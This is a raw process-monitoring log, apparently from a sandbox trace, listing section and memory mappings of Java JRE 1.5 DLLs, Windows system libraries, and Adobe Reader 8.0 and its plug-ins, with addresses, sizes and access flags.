Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\JavaWebStart.dll Access: query and write and read and execute Type: image Baseaddress: 6D320000 Size: 143360 Protection: read write Mapped to pid: own pid success or wait 2491608794
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\NPJPI150_01.dll Access: write and read and execute Type: commit Baseaddress: 41A0000 Size: 73728 Protection: execute Mapped to pid: own pid success or wait 2491656752
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\NPJPI150_01.dll Access: query and write and read and execute Type: image Baseaddress: 6D590000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2491739344
Section loaded Path: \KnownDlls\OLEPRO32.DLL Access: write and read and execute Type: unknown Baseaddress: 6D590000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 2491745969
Section loaded Path: C:\WINDOWS\system32\olepro32.dll Access: query and write and read and execute Type: image Baseaddress: 5EDD0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2491748682
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\jpiexp32.dll Access: write and read and execute Type: commit Baseaddress: 41A0000 Size: 98304 Protection: execute Mapped to pid: own pid success or wait 2491790015
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\jpiexp32.dll Access: query and write and read and execute Type: image Baseaddress: 6D400000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2491822499
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: write and read and execute Type: commit Baseaddress: 41A0000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2491851860
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: query and write and read and execute Type: image Baseaddress: 76FB0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2491858003
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\jpishare.dll Access: write and read and execute Type: commit Baseaddress: 41B0000 Size: 81920 Protection: execute Mapped to pid: own pid success or wait 2491891664
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\jpishare.dll Access: query and write and read and execute Type: image Baseaddress: 6D450000 Size: 98304 Protection: read write Mapped to pid: own pid success or wait 2491908867
Section loaded Path: \KnownDlls\shfolder.dll Access: write and read and execute Type: unknown Baseaddress: 6D450000 Size: 98304 Protection: read write Mapped to pid: own pid object name not found 2491943189
Section loaded Path: C:\WINDOWS\system32\shfolder.dll Access: query and write and read and execute Type: image Baseaddress: 76780000 Size: 36864 Protection: read write Mapped to pid: own pid success or wait 2491946184
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\client\jvm.dll Access: write and read and execute Type: commit Baseaddress: 41B0000 Size: 1527808 Protection: execute Mapped to pid: own pid success or wait 2492034484
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\client\jvm.dll Access: query and write and read and execute Type: image Baseaddress: 6D640000 Size: 1593344 Protection: read write Mapped to pid: own pid success or wait 2492056663
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\hpi.dll Access: write and read and execute Type: commit Baseaddress: 41C0000 Size: 36864 Protection: execute Mapped to pid: own pid success or wait 2492402369
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\hpi.dll Access: query and write and read and execute Type: image Baseaddress: 6D280000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2492418460
Section loaded Path: \BaseNamedObjects\hsperfdata_Administrator_1712 Access: query and write and read Type: commit Baseaddress: 41C0000 Size: 65536 Protection: read write Mapped to pid: own pid success or wait 2492460529
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\verify.dll Access: write and read and execute Type: commit Baseaddress: 41D0000 Size: 53248 Protection: execute Mapped to pid: own pid success or wait 2492481927
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\verify.dll Access: query and write and read and execute Type: image Baseaddress: 6D610000 Size: 49152 Protection: read write Mapped to pid: own pid success or wait 2492512264
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\java.dll Access: write and read and execute Type: commit Baseaddress: 41D0000 Size: 122880 Protection: execute Mapped to pid: own pid success or wait 2492531479
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\java.dll Access: query and write and read and execute Type: image Baseaddress: 6D300000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2492569901
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\zip.dll Access: write and read and execute Type: commit Baseaddress: 41D0000 Size: 65536 Protection: execute Mapped to pid: own pid success or wait 2492604747
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\zip.dll Access: query and write and read and execute Type: image Baseaddress: 6D630000 Size: 61440 Protection: read write Mapped to pid: own pid success or wait 2492645849
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\client\classes.jsa Access: query and read Type: commit Baseaddress: 2AA80000 Size: 5308416 Protection: readonly Mapped to pid: own pid success or wait 2496693465
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\client\classes.jsa Access: query and read Type: commit Baseaddress: 2B280000 Size: 5832704 Protection: write copy Mapped to pid: own pid success or wait 2496700857
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\client\classes.jsa Access: query and read Type: commit Baseaddress: 2BE80000 Size: 851968 Protection: write copy Mapped to pid: own pid success or wait 2496705953
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\zip.dll Access: write and read and execute Type: commit Baseaddress: 6A30000 Size: 65536 Protection: execute Mapped to pid: own pid success or wait 2497638421
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\awt.dll Access: write and read and execute Type: commit Baseaddress: 6E30000 Size: 1331200 Protection: execute Mapped to pid: own pid success or wait 2498550986
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\awt.dll Access: query and write and read and execute Type: image Baseaddress: 6D000000 Size: 1466368 Protection: read write Mapped to pid: own pid success or wait 2498595200
Section loaded Path: \KnownDlls\ddraw.dll Access: write and read and execute Type: unknown Baseaddress: 6D000000 Size: 1466368 Protection: read write Mapped to pid: own pid object name not found 2500295299
Section loaded Path: C:\WINDOWS\system32\ddraw.dll Access: query and write and read and execute Type: image Baseaddress: 73760000 Size: 307200 Protection: read write Mapped to pid: own pid success or wait 2500298523
Section loaded Path: \KnownDlls\DCIMAN32.dll Access: write and read and execute Type: unknown Baseaddress: 73760000 Size: 307200 Protection: read write Mapped to pid: own pid object name not found 2500365856
Section loaded Path: C:\WINDOWS\system32\dciman32.dll Access: query and write and read and execute Type: image Baseaddress: 73BC0000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 2500369291
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\fontmanager.dll Access: write and read and execute Type: commit Baseaddress: 6E30000 Size: 253952 Protection: execute Mapped to pid: own pid success or wait 2500554953
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\fontmanager.dll Access: query and write and read and execute Type: image Baseaddress: 6D240000 Size: 249856 Protection: read write Mapped to pid: own pid success or wait 2500561202
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\deploy.dll Access: write and read and execute Type: commit Baseaddress: 7130000 Size: 69632 Protection: execute Mapped to pid: own pid success or wait 2501044530
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\deploy.dll Access: query and write and read and execute Type: image Baseaddress: 6D1F0000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 2501083475
Section loaded Path: \KnownDlls\shfolder.dll Access: write and read and execute Type: unknown Baseaddress: 6D1F0000 Size: 77824 Protection: read write Mapped to pid: own pid object name not found 2501154221
Section loaded Path: C:\WINDOWS\system32\shfolder.dll Access: query and write and read and execute Type: image Baseaddress: 76780000 Size: 36864 Protection: read write Mapped to pid: own pid success or wait 2501157168
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\RegUtils.dll Access: write and read and execute Type: commit Baseaddress: 7340000 Size: 122880 Protection: execute Mapped to pid: own pid success or wait 2502676229
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\RegUtils.dll Access: query and write and read and execute Type: image Baseaddress: 6D5D0000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2502714856
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\jpicom32.dll Access: write and read and execute Type: commit Baseaddress: 7440000 Size: 86016 Protection: execute Mapped to pid: own pid success or wait 2503519720
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\jpicom32.dll Access: query and write and read and execute Type: image Baseaddress: 6D3E0000 Size: 81920 Protection: read write Mapped to pid: own pid success or wait 2503563078
Section loaded Path: C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroPDF.dll Access: write and read and execute Type: commit Baseaddress: 6F30000 Size: 634880 Protection: execute Mapped to pid: own pid success or wait 2504906065
Section loaded Path: C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroPDF.dll Access: query and write and read and execute Type: image Baseaddress: 6F30000 Size: 626688 Protection: read write Mapped to pid: own pid conflicting addresses 2504946865
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\msvcp80.dll Access: query and write and read and execute Type: image Baseaddress: 7C420000 Size: 552960 Protection: read write Mapped to pid: own pid success or wait 2505371287
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 344064 Protection: execute Mapped to pid: own pid success or wait 2505557585
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Access: query and read Type: commit Baseaddress: 7830000 Size: 344064 Protection: readonly Mapped to pid: own pid success or wait 2505591180
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 344064 Protection: execute Mapped to pid: own pid success or wait 2505603053
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Access: query and read Type: commit Baseaddress: 7830000 Size: 344064 Protection: readonly Mapped to pid: own pid success or wait 2505605216
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 7830000 Size: 344064 Protection: readonly Mapped to pid: own pid success or wait 2505608412
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 7830000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2505610409
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Access: write and read and execute Type: commit Baseaddress: 7960000 Size: 344064 Protection: execute Mapped to pid: own pid success or wait 2505660478
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Access: query and read Type: commit Baseaddress: 7960000 Size: 344064 Protection: readonly Mapped to pid: own pid success or wait 2505663018
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Access: write and read and execute Type: commit Baseaddress: 7960000 Size: 344064 Protection: execute Mapped to pid: own pid success or wait 2505667298
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Access: query and read Type: commit Baseaddress: 7960000 Size: 344064 Protection: readonly Mapped to pid: own pid success or wait 2505669860
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Access: query and read Type: commit Baseaddress: 7830000 Size: 344064 Protection: readonly Mapped to pid: own pid success or wait 2505703100
Section loaded Path: C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroPDF.dll Access: query and read Type: commit Baseaddress: 6FF0000 Size: 49152 Protection: readonly Mapped to pid: own pid success or wait 2517476820
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Accessibility.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 356352 Protection: execute Mapped to pid: own pid success or wait 2517487796
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Accessibility.api Access: query and read Type: commit Baseaddress: 7830000 Size: 356352 Protection: readonly Mapped to pid: own pid success or wait 2517492994
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Accessibility.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 356352 Protection: execute Mapped to pid: own pid success or wait 2517520991
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Accessibility.api Access: query and read Type: commit Baseaddress: 7830000 Size: 356352 Protection: readonly Mapped to pid: own pid success or wait 2517524490
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\AcroForm.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 8658944 Protection: execute Mapped to pid: own pid success or wait 2517529635
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\AcroForm.api Access: query and read Type: commit Baseaddress: 7830000 Size: 8658944 Protection: readonly Mapped to pid: own pid success or wait 2517534772
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\AcroForm.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 8658944 Protection: execute Mapped to pid: own pid success or wait 2517660172
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\AcroForm.api Access: query and read Type: commit Baseaddress: 7830000 Size: 8658944 Protection: readonly Mapped to pid: own pid success or wait 2517664357
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Annots.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 4124672 Protection: execute Mapped to pid: own pid success or wait 2517687196
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Annots.api Access: query and read Type: commit Baseaddress: 7830000 Size: 4124672 Protection: readonly Mapped to pid: own pid success or wait 2517692149
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Annots.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 4124672 Protection: execute Mapped to pid: own pid success or wait 2517753059
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Annots.api Access: query and read Type: commit Baseaddress: 7830000 Size: 4124672 Protection: readonly Mapped to pid: own pid success or wait 2517756586
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Checkers.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 839680 Protection: execute Mapped to pid: own pid success or wait 2517768030
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Checkers.api Access: query and read Type: commit Baseaddress: 7830000 Size: 839680 Protection: readonly Mapped to pid: own pid success or wait 2517775337
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Checkers.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 839680 Protection: execute Mapped to pid: own pid success or wait 2517785382
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Checkers.api Access: query and read Type: commit Baseaddress: 7830000 Size: 839680 Protection: readonly Mapped to pid: own pid success or wait 2517788886
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DigSig.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 1150976 Protection: execute Mapped to pid: own pid success or wait 2517794412
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DigSig.api Access: query and read Type: commit Baseaddress: 7830000 Size: 1150976 Protection: readonly Mapped to pid: own pid success or wait 2517799054
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DigSig.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 1150976 Protection: execute Mapped to pid: own pid success or wait 2517811058
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DigSig.api Access: query and read Type: commit Baseaddress: 7830000 Size: 1150976 Protection: readonly Mapped to pid: own pid success or wait 2517814135
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DVA.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 2517821628
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DVA.api Access: query and read Type: commit Baseaddress: 7000000 Size: 126976 Protection: readonly Mapped to pid: own pid success or wait 2517826515
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DVA.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 2517832170
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DVA.api Access: query and read Type: commit Baseaddress: 7000000 Size: 126976 Protection: readonly Mapped to pid: own pid success or wait 2517835611
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\eBook.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 53248 Protection: execute Mapped to pid: own pid success or wait 2517839696
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\eBook.api Access: query and read Type: commit Baseaddress: 7000000 Size: 53248 Protection: readonly Mapped to pid: own pid success or wait 2517844813
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\eBook.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 53248 Protection: execute Mapped to pid: own pid success or wait 2517850121
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\eBook.api Access: query and read Type: commit Baseaddress: 7000000 Size: 53248 Protection: readonly Mapped to pid: own pid success or wait 2517853571
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EScript.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 1417216 Protection: execute Mapped to pid: own pid success or wait 2517857479
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EScript.api Access: query and read Type: commit Baseaddress: 7830000 Size: 1417216 Protection: readonly Mapped to pid: own pid success or wait 2517862372
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EScript.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 1417216 Protection: execute Mapped to pid: own pid success or wait 2517875594
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EScript.api Access: query and read Type: commit Baseaddress: 7830000 Size: 1417216 Protection: readonly Mapped to pid: own pid success or wait 2517879451
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EWH32.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 2517886367
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EWH32.api Access: query and read Type: commit Baseaddress: 7000000 Size: 126976 Protection: readonly Mapped to pid: own pid success or wait 2517890935
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EWH32.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 2517896428
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EWH32.api Access: query and read Type: commit Baseaddress: 7000000 Size: 126976 Protection: readonly Mapped to pid: own pid success or wait 2517899973
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\HLS.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 53248 Protection: execute Mapped to pid: own pid success or wait 2517903973
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\HLS.api Access: query and read Type: commit Baseaddress: 7000000 Size: 53248 Protection: readonly Mapped to pid: own pid success or wait 2517908616
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\HLS.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 53248 Protection: execute Mapped to pid: own pid success or wait 2517914381
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\HLS.api Access: query and read Type: commit Baseaddress: 7000000 Size: 53248 Protection: readonly Mapped to pid: own pid success or wait 2517917834
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\IA32.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 86016 Protection: execute Mapped to pid: own pid success or wait 2517921681
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\IA32.api Access: query and read Type: commit Baseaddress: 7000000 Size: 86016 Protection: readonly Mapped to pid: own pid success or wait 2517926486
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\IA32.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 86016 Protection: execute Mapped to pid: own pid success or wait 2517932373
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\IA32.api Access: query and read Type: commit Baseaddress: 7000000 Size: 86016 Protection: readonly Mapped to pid: own pid success or wait 2517936231
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ImageViewer.API Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 471040 Protection: execute Mapped to pid: own pid success or wait 2517940290
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ImageViewer.API Access: query and read Type: commit Baseaddress: 7830000 Size: 471040 Protection: readonly Mapped to pid: own pid success or wait 2517945212
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ImageViewer.API Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 471040 Protection: execute Mapped to pid: own pid success or wait 2517952599
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ImageViewer.API Access: query and read Type: commit Baseaddress: 7830000 Size: 471040 Protection: readonly Mapped to pid: own pid success or wait 2517956112
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\MakeAccessible.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 2035712 Protection: execute Mapped to pid: own pid success or wait 2517960942
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\MakeAccessible.api Access: query and read Type: commit Baseaddress: 7830000 Size: 2035712 Protection: readonly Mapped to pid: own pid success or wait 2517965857
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\MakeAccessible.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 2035712 Protection: execute Mapped to pid: own pid success or wait 2517981480
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\MakeAccessible.api Access: query and read Type: commit Baseaddress: 7830000 Size: 2035712 Protection: readonly Mapped to pid: own pid success or wait 2517985415
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Multimedia.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 1347584 Protection: execute Mapped to pid: own pid success or wait 2517994003
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Multimedia.api Access: query and read Type: commit Baseaddress: 7830000 Size: 1347584 Protection: readonly Mapped to pid: own pid success or wait 2517998972
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Multimedia.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 1347584 Protection: execute Mapped to pid: own pid success or wait 2518030456
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Multimedia.api Access: query and read Type: commit Baseaddress: 7830000 Size: 1347584 Protection: readonly Mapped to pid: own pid success or wait 2518033970
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PDDom.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 2518040683
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PDDom.api Access: query and read Type: commit Baseaddress: 7830000 Size: 401408 Protection: readonly Mapped to pid: own pid success or wait 2518046009
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PDDom.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 2518053061
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PDDom.api Access: query and read Type: commit Baseaddress: 7830000 Size: 401408 Protection: readonly Mapped to pid: own pid success or wait 2518057043
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PPKLite.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 5771264 Protection: execute Mapped to pid: own pid success or wait 2518061691
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PPKLite.api Access: query and read Type: commit Baseaddress: 7830000 Size: 5771264 Protection: readonly Mapped to pid: own pid success or wait 2518066722
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PPKLite.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 5771264 Protection: execute Mapped to pid: own pid success or wait 2518161404
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PPKLite.api Access: query and read Type: commit Baseaddress: 7830000 Size: 5771264 Protection: readonly Mapped to pid: own pid success or wait 2518165250
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ReadOutLoud.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2518181963
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ReadOutLoud.api Access: query and read Type: commit Baseaddress: 7000000 Size: 110592 Protection: readonly Mapped to pid: own pid success or wait 2518186824
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ReadOutLoud.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2518192413
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ReadOutLoud.api Access: query and read Type: commit Baseaddress: 7000000 Size: 110592 Protection: readonly Mapped to pid: own pid success or wait 2518195886
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\reflow.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 364544 Protection: execute Mapped to pid: own pid success or wait 2518199983
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\reflow.api Access: query and read Type: commit Baseaddress: 7830000 Size: 364544 Protection: readonly Mapped to pid: own pid success or wait 2518205154
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\reflow.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 364544 Protection: execute Mapped to pid: own pid success or wait 2518217593
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\reflow.api Access: query and read Type: commit Baseaddress: 7830000 Size: 364544 Protection: readonly Mapped to pid: own pid success or wait 2518221074
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SaveAsRTF.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 303104 Protection: execute Mapped to pid: own pid success or wait 2518225630
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SaveAsRTF.api Access: query and read Type: commit Baseaddress: 7830000 Size: 303104 Protection: readonly Mapped to pid: own pid success or wait 2518230528
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SaveAsRTF.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 303104 Protection: execute Mapped to pid: own pid success or wait 2518237455
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SaveAsRTF.api Access: query and read Type: commit Baseaddress: 7830000 Size: 303104 Protection: readonly Mapped to pid: own pid success or wait 2518240955
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 356352 Protection: execute Mapped to pid: own pid success or wait 2518245386
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search.api Access: query and read Type: commit Baseaddress: 7830000 Size: 356352 Protection: readonly Mapped to pid: own pid success or wait 2518250344
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 356352 Protection: execute Mapped to pid: own pid success or wait 2518258447
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search.api Access: query and read Type: commit Baseaddress: 7830000 Size: 356352 Protection: readonly Mapped to pid: own pid success or wait 2518261876
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search5.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 86016 Protection: execute Mapped to pid: own pid success or wait 2518265837
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search5.api Access: query and read Type: commit Baseaddress: 7000000 Size: 86016 Protection: readonly Mapped to pid: own pid success or wait 2518271422
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search5.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 86016 Protection: execute Mapped to pid: own pid success or wait 2518276745
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search5.api Access: query and read Type: commit Baseaddress: 7000000 Size: 86016 Protection: readonly Mapped to pid: own pid success or wait 2518280196
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SendMail.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 2518284112
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SendMail.api Access: query and read Type: commit Baseaddress: 7000000 Size: 126976 Protection: readonly Mapped to pid: own pid success or wait 2518289044
